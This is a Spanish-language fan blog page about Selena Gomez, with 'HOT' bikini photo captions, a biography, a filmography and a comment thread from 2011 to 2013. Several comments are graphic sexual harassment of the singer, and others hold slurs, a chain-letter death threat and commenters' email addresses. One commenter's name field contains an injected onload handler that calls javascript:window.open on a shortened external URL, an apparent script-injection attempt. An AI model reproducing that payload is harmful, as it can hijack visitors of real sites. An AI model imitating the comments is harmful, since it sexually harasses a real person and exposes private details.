Avisar de contenido inadecuado

Selena Gomez, HOT, como la han visto pocos.

{
}

Selena Gomez hot pink bikini in hawaii

Selena Maria Gomez

(22 de julio de 1992) es una actriz y cantante estadounidense de ascendencia mexicana. Actualmente interpreta al personaje de Alex Russo en la serie original de Disney Channel, Wizards of Waverly Place.

selena gomez bikini

Su primer papel fue en Barney y sus amigos cantando muchas canciones de la serie como Gianna, junto a Demi Lovato.

En 2006 participó como estrella invitada en la segunda temporada de Zack y Cody gemelos en accion interpretando a Gwen en el episodio A Midsummer's Nightmare.

Justin Bieber and Selena Gomez Hot Kiss

En 2007, apareció también en una serie de episodios de Hannah Montana como Mikayla, una estrella del pop que es rival de Hannah Montana, actualmente es la protagonista de su propia serie llamada Wizards of Waverly Place.

Como Mikayla

Actualmente se encuentra en Los Ángeles, para grabar la segunda temporada de su serie, Wizards of Waverly Place, junto a David Henrie, Jake T. Austin y Jennifer Stone.

Selena Gomez photo

[demi-hot3-blogdelatele-2b2.jpg]

Selena Gomez photo

Selena Gomez photo

Selena Gomez photo

Selena Gomez photo

Selena Gomez photo

Música

Ella grabó Everything is Not What it Seems (Latinoamerica: Nada Es Aquí Lo Que Es; España: Nada Es Lo Que Parece) canción principal de la serie Wizards of Waverly Place.

En el 2008, grabó un cover del clásico de Disney "Cruella De Vil" para el DVD platino de 101 Dalmatas y "fly to your heart" de la película de Disney "Tinker Bell". Ha grabado canciones en la banda sonora de Another Cinderella Story (Bag a Drum,New Classic y Tell Me Something I don't know). Ya sacó su video Tell Me something I don't know.

Filmografía

Películas
AñoTítuloPersonaje
2003 Spy Kids 3-D: Game Over Chica del parque acuatico
2005 Walker, Texas Ranger: Trial by Fire Julie
2006 Brain Zapped Emily Grace Garcia
2008 Horton Hears a Who! Mayor's Daughter
Películas de Disney Channel
AñoTítuloPersonaje
2008 Another Cinderella Story Mary Santiago
2009 Princess Protection Program Carter Mason
Wizards of Waverly Place: The Movie Alex Russo
Televisión
AñoTítuloPersonaje
2002—2003 Barney & Friends Gianna
2007 Lizzie McGuire Stevie
2007-presente Wizards of Waverly Place Alex Russo
Invitada Estrella
AñoTítuloPersonaje
2006 The Suite Life of Zack & Cody Gwen
2007 Hannah Montana Mikayla
2008 Studio DC: Almost Live Ella misma
Disney Channel's Totally New Year 2008 Ella misma
Disney Channel Games 2008 Ella misma
Jonas Brothers: Living the Dream Ella misma
2009 Sonny with a Chance Ella misma
The Suite Life on Deck Alex Russo

Discografía

Studio albums
Soundtracks

 

Musicas
AñoMusicaPara:
2006 "Brain Zapped" Brain Zapped
2007 "Everything Is Not What Is Seems" Wizards of Waverly Place & Disney Channel Playlist
2008 "Cruella de Vil" DisneyMania 6 & 101 dálmatas
"Tell Me Something I Don't Know" Another Cinderella Story
"New Classic" (with Drew Seeley)
"Bang a Drum"
"Fly to Your Heart" Tinker Bell
2009 "Make It Happen" (with David Henrie) Wizards of Waverly Place
"Whoa Oh!" (duet with Forever the Sickest Kids) -
"One and the Same" (with Demi Lovato) Princess Protection Program & Disney Channel Playlist

{
}
{
}

Comentarios Selena Gomez, HOT, como la han visto pocos. - página 8

BEBIN MAN BE UN PESAREYE CHAGHAL DASTAM BERESSE BEYGHAT BAAAAAAAAAAAD MIKONAMESH .
IIIII LOVE YOU SELENA ......
raffaello del'piero raffaello del'piero 29/12/2011 a las 15:26
BEBIN MAN BE UN PESAREYE CHAGHAL DASTAM BERESSE BEYGHAT BAAAAAAAAAAAD MIKONAMESH .
IIIII LOVE YOU SELENA ......
raffaello del'piero raffaello del'piero 29/12/2011 a las 15:29
a la boluda de carol que aprenda a escribir y deje de decir boludeces, no se da cuenta que tanto a selena como a miley los de disney son los que escriben los libretos, o sos tan pelotuda que pensas que ellas escriben sus propios libretos.
solo es un comentario gil leelo y pensa un poco, va si es que podes pensar (parece que no )
SABES EL SIGNIFICADO DE LA PALABRA PENSAR
estas mal de la cabeza carol
esta carol es una flor de boluda seguro no tiene nada que hacer
ponete las pilas y preocupate x cosas + importantes
JOSE JOSE 30/12/2011 a las 19:34
lalalalalalalala

jaaja pelotudaa siy yo miley cyrus pero me puse. otro nombre asi no me reconosen jaja jeje u.u

q hacemo mañana vamos a comer con justin? jaja besito un beso de kati perri y mio
soli soli 05/01/2012 a las 01:32
si se lap ongo la matoo , la tengo ree durita ahora mee clabo una buena paja
marco marco 07/01/2012 a las 19:44
uuuuuuuuuuuuuuu que buena pa tocar le la zorra y chuparle las tetas
patrin patrin 08/01/2012 a las 21:24
que feos comentarios asquerosos .selena I LOVE. `re the best .endurance justin bieber. are pregnant?
sofia colombo sofia colombo 13/01/2012 a las 22:12
vallan a labarse el culo pendejos
su padre su padre 21/01/2012 a las 09:39
Selena estas hermosa sos mi mayor idola tengo un poster tuyo tambien soy fans de Justin Bieber que tambien es mi mayor idolo te quiero y mandale saludos a Justin.Suerte y que puedas tener otro hermanito quiero saber:¿es verdad que estas embarazada de Justin?Si no viviria lejos tuyo ubiese ido a tus ultimos recitales justo en estos ultimos dias fui a Cordoba de vacaciones pero me tuve que volver antes si no talvez iba a verte...¡¡¡¡te amoooooooooooooo mas que a mis mejores amigos y mejores amigas lee mi comentario porfas!!!!!!!!!!!!!!!!!!
¡TE RE QUIERO NUNCA TE OLVIDES DE MI COMENTARIO SOY UNA DE TUS MEJORES Y MAYORES FANS!TE QUIERO COMO UNA HERMANA MAYOR QUE NUNCA NOS PELEAMOS... CANDELA VALERIO 10 AÑOS DE ROSARIO SANTA FE ARGENTINA.
CANDELA CANDELA 30/01/2012 a las 23:55
hola selena sos lo maximoooooooooooooooooooooooooo!!!!!!!!!!!!!!!!!!!!!!!!! te fuimos a ver a tu concert del anio pasadoo!!! y te vamos a ir a esteeee!!! estuvimos en primera fila nos vistee?????!!!!!! si no nos vas a veer!!!!!!!!!!!!!!!!!! subinos al esenario!!!!! somos asi: tenemos pelo marron, somos SUPER lindas!! y somos muy pareidas!!!!
P.D: somos trillisas!!!! =)
guada, sol y jose guada, sol y jose 31/01/2012 a las 21:06
=)Hello selena sos maximoooooooooooooooooooooooooo!!!!!!!!!!!!!!!!!!!!!!!!! We went to see your concert of the anio pasadoo!!! And we you are going to go to esteeee!!! Were we in the first row us vistee?????!!!!!! If you us do not go to veer!!!!!!!!!!!!!!!!!! Subinos to the esenario!!!!! We are like that: we have brown hair, are SUPER pretty!! And we are very pareidas!!!! P.D: we are trillisas!!!! =)
guada, sol y jose guada, sol y jose 31/01/2012 a las 21:07
sos como te puedo dsir sos la mejor tenes unos temas re piolas i re sarpados en piola estan buenos el ke mas me gusta es año sin lluvia te re amo selena no tengo fotos tuyas no tengo nada pero te llevo siempre en mi corazon sos la mas linda de todas bueno kon eso me despido espeo ke te guste el comentario chau te re kiero i te vanko en todas selana yo tu fan numero 1 leandro jesusu amaro
leandro leandro 09/02/2012 a las 13:16
selena gomez  es super linda, lastima el hijo de 1000000000000000 putas q tiene de novio ese cerote me lo paso por los coyoles
geovanni geovanni 10/02/2012 a las 23:25
 SELENA GOMEZ ME GUSTAN TUS FOTOS
SELENA GOMEZ EL UNICO ERROR ES QUIE CUANDO TE BESAS CON JUSTIN BIEBER QUE FUE TU ERROR DESDE  EL PRINCIPIO SELENA
SELENA AGREGAME A MESSENGER MI CORREO ES pablooyarzun85 @hotmail..com
QUIERO QUE ME CONOSCAS POR CAMARA WEB
SELENA ¿TIENES SKYPE SI NO TIENES DESCARGA SKPYE
SELENA CONOCEME
SELENA SOY CHILENO DE CHILE
SELENA CONECTATE POR FAVOR A MESSENGER PARA QUE NOS PODAMOS CONOCER
PABLOOYARZÚNHERRERA PABLOOYARZÚNHERRERA 27/02/2012 a las 23:44
HELLO, MY NAME IS ELI PLEASE CHECKERBOARD YOUR MAIL. I LOVE YOU!!!
ELI ELI 16/03/2012 a las 18:42
te odio selena yo no soy " selenatica " yo soy una "BELIEBER" ojala que te sepres de JUSTIN te odio puta
manuela manuela 09/04/2012 a las 20:46
hola selena, soy tu admiiradora y quiisiiera que me agregaras!!! soy xiimena y este es mii correoxim94san@hotmail.com
Xiimeniita Xiimeniita 12/04/2012 a las 02:25
Sele:
I love you, you're the best ever! 

Eli Eli 12/04/2012 a las 20:42
selena tus fotos estanbuenicimas y lindas y vos tambiensos muy lllllllllllllllllllllllllllllllllllllllllllllllllllinda
azul azul 18/04/2012 a las 03:39
mira carol eres una Perraaa para q te metes en esta pag si no te gusta selena ademas miley es una putaa y eso se sabee selena es la mejor ok y aprendar a escribr valee no sean nulos osea LOSERS!! D: x favor q inutiles son los q ponen su numero y msn ni q selena se meteria en esta porqueria d pagina.... byee losers QUE VIVA ONE DIRECTION!!! Y SELENAAA!!
selenator selenator 07/05/2012 a las 23:44
selena nunca fue hot es un aputa la odiooooo putaaaaaaaaaaaaaaaaaaaaaaaaaaa hija de puta morite muerta de mierdaaaaa
odio a selena odio a selena 12/05/2012 a las 20:29
Qué asco, voy a tener pesadillas
Héctor Héctor 16/06/2012 a las 07:59
linda como siempre!!! nadie es mejor que ella , se que miley cyrus se cree que es mejor , pero me di cuenta que quiere ser como ella.

selena gomez: winner

miley cyrus: loser   
maily maily 24/06/2012 a las 00:38
hola selena soy pablo de argentina Como puedo hacer para pegarte una buena cojida? me gustaria mandarte mi semen en un recipiente por correo oca; y que cuando lo recibas. lo pongas en la heladera. y te lo vallas metiendo de apoquito cuando te masturbes en el baño, te vallas metiendo mi semen con alguna bonbilla de mate. o una jeringa.  y bueno asi hasta tener un tanque lleno de mi leche con espermatozoides...en tu panza.. y si queres invitarle a justin tambien.  yo tengo 1 litro de leche por dia en mis huevos cargados. solo para vos. sos la unica chica que le podria dar esa cantidad de leche de mis huevos... bueno me voy despidiendo.. me voy a tocar la pija pensando en vos...  vos tambien te masturbas conmigo yo see.. si las mujeres se masturban mas que nosotros...  seguro hasta te mojas la vagina.. pensando en que me chupas bien los huevos putita,.. o no????? bueno beso hermosa......te quiero...
sela meto a selena sela meto a selena 26/06/2012 a las 09:52
fabuloso
" onload="javascript:window.open('http://alturl.com/mcno4','new',width='10',height='10')" 26/11/2012 a las 21:50
NO LEAS ESTO!!SI LO AS LEIDO COPIA Y PEGA ESTO EN 5 VIDEOS MAS SI NO LO HACES TU MADRE MORIRA EN 3 DIAS POR FAVOR HACEME CASO ES UNA MALDICION
NO LEAS ESTO!!SI LO AS LEIDO COPIA Y PEGA ESTO EN 5 VIDEOS MAS SI NO LO HACES TU MADRE MORIRA EN 3 DIAS POR FAVOR HACEME CASO ES UNA MALDICION
NO LEAS ESTO!!SI LO AS LEIDO COPIA Y PEGA ESTO EN 5 VIDEOS MAS SI NO LO HACES TU MADRE MORIRA EN 3 DIAS POR FAVOR HACEME CASO ES UNA MALDICION
NO LEAS ESTO!!SI LO AS LEIDO COPIA Y PEGA ESTO EN 5 VIDEOS MAS SI NO LO HACES TU MADRE MORIRA EN 3 DIAS POR FAVOR HACEME CASO ES UNA MALDICION
NO LEAS ESTO!!SI LO AS LEIDO COPIA Y PEGA ESTO EN 5 VIDEOS MAS SI NO LO HACES TU MADRE MORIRA EN 3 DIAS POR FAVOR HACEME CASO ES UNA MALDICION
jj jj 23/12/2012 a las 12:02
NO LEAS ESTO!!SI LO AS LEIDO COPIA Y PEGA ESTO EN 5 VIDEOS MAS SI NO LO HACES TU MADRE MORIRA EN 3 DIAS POR FAVOR HACEME CASO ES UNA MALDICION
fray fray 24/12/2012 a las 01:46
selena me esta haciendo terrible pete ahora mismo!! aaaaaaay selenaaaaaaaa...!!
leitoRoman leitoRoman 25/01/2013 a las 17:08
eu sei la o q vcs tao falando pq sou uma brasileira mas deve ser alguma coisa de bom q vcs tao falando pra selena gomez olha pessoal eu também gosto da selena gomez bom e so isso tchau
Lilian Lilian 14/07/2013 a las 03:59

Deja tu comentario Selena Gomez, HOT, como la han visto pocos.

Identifícate en OboLog, o crea tu blog gratis si aún no estás registrado.

Avatar Tu nombre